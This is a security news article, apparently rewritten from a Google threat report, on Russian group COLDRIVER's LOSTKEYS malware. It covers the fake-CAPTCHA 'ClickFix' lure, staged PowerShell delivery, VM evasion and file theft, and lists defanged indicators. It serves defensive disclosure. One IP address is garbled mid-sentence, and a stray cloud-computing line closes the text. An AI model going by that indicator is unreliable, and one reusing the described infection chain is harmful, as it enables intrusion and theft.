UNC4057 LOSTKEYS
COLDRIVER, a Russian government-backed group, targets Western organizations and non-governmental organizations with its new malware, LOSTKEYS.
A new piece of malware called LOSTKEYS has been used by the Russian government-backed threat organization COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto) to steal documents from non-governmental organizations (NGOs) and Western targets. The Google Threat Intelligence Group (GTIG), which has been monitoring COLDRIVER for a long time, including their SPICA virus in 2024, claims that LOSTKEYS is a new addition to their toolkit.
Credential phishing attacks against well-known targets are the main activity of COLDRIVER. These targets usually include people at NGO addresses or their personal email accounts. Known for stealing login passwords, they also exfiltrate emails and steal contact lists once they get access to a target’s account. In certain cases, COLDRIVER may also try to access system files and infect target devices with malware.
COLDRIVER’s recent attacks have targeted journalists, think tanks, NGOs, and former and present advisors to Western governments and militaries. Additionally, the group has persisted in targeting those with ties to Ukraine. It is thought that gathering intelligence in support of Russia’s strategic objectives is the main objective of COLDRIVER’s actions. In a few instances, the group has been connected to hack-and-leak efforts that targeted an NGO and UK officials.
In January, March, and April of 2025, the new malware, LOSTKEYS, was discovered. It is a malicious program that can send the attacker system data and active processes in addition to stealing files from a hard-coded list of directories and extensions. Although COLDRIVER usually uses credentials to gain access to contacts and emails, they have sometimes used malware such as SPICA to gain access to documents on a target machine. LOSTKEYS is used in very specific situations and is made to accomplish a similar goal.
A luring website with a phoney CAPTCHA is the first step in the multi-step infection chain that delivers LOSTKEYS. The PowerShell code is copied to the user’s clipboard once the CAPTCHA appears to have been “verified,” and the page asks the user to launch the PowerShell using Windows’ “run” prompt. This method, which is sometimes called “ClickFix,” involves socially engineering targets to copy, paste, and run PowerShell scripts. Numerous APT and monetarily motivated attackers employ this tactic, according to Google Threat Intelligence Group, and it has been extensively publicised.
PowerShell retrieves and runs the second step in the first stage. This second stage was obtained from the IP address 165.227.148[.] in several of the occurrences that were observed.68. A device evasion phase is included in the second stage, which computes the MD5 hash of the display resolution and halts execution if the hash matches one of three predetermined values. The purpose of this step is probably to avoid execution in virtual machines (VMs). The request must contain distinct IDs that are specific to each observed instance of this chain in order to get the subsequent step. The third stage is obtained from the same host as the preceding phases in every instance that has been observed.
A Base64-encoded blob that decodes into more PowerShell is the third step. The last LOSTKEYS payload must be retrieved and decoded at this step. Using distinct identities for each infection chain, it downloads two more files from the same host in order to do this. The “decoder,” a Visual Basic Script (VBS) file that was downloaded first, is in charge of decoding the second file. Two distinct keys are used for each infection chain in the decoding procedure. The decoder script has one unique key, while stage 3 stores the second key. The encoded blob is subjected to a replacement cypher using these keys.
A VBS script called LOSTKEYS is the last payload. It carries out the functions of file theft and system information gathering.
Two further samples that were performing LOSTKEYS were found as part of the examination into this behaviour, and they were from as early as December 2023. Since these earlier samples are Portable Executable (PE) files posing as being connected to the software program Maltego, they differ significantly from the execution chain beginning in 2025. Whether these December 2023 samples are specifically connected to COLDRIVER or whether the malware was repurposed from another operation into the activity seen starting in January 2025 is still unknown. Hashes for these binaries and related command and control (C2) addresses, such as njala[.]dev and 80.66.88[.]67, are among the Indicators of Compromise (IOCs) that are being exchanged.
Google Threat Intelligence Group leverages their research on threat actors like COLDRIVER to improve the security and safety of Google’s products in order to protect customers who are at danger. To safeguard users, all harmful websites, domains, and files are added to Safe Browsing as soon as they are found. Government-backed attacker notifications alert targeted Gmail and Workspace users to the activities. Enrolling in Google’s Advanced Protection Program, turning on Enhanced Safe Browsing for Chrome, and making sure all devices are up to date are all advised for potential targets.
In order to increase awareness and support businesses and individuals who could have been targeted, Google is dedicated to sharing its discoveries with the security community. The goal of exchanging this knowledge about strategies and tactics is to improve threat hunting skills and result in more robust user safeguards throughout the sector. The original post contains YARA rules and indicators of compromise, and it is also accessible as a Google Threat Intelligence collection and rule pack.
Thank you for your Interest in Cloud Computing. Please Reply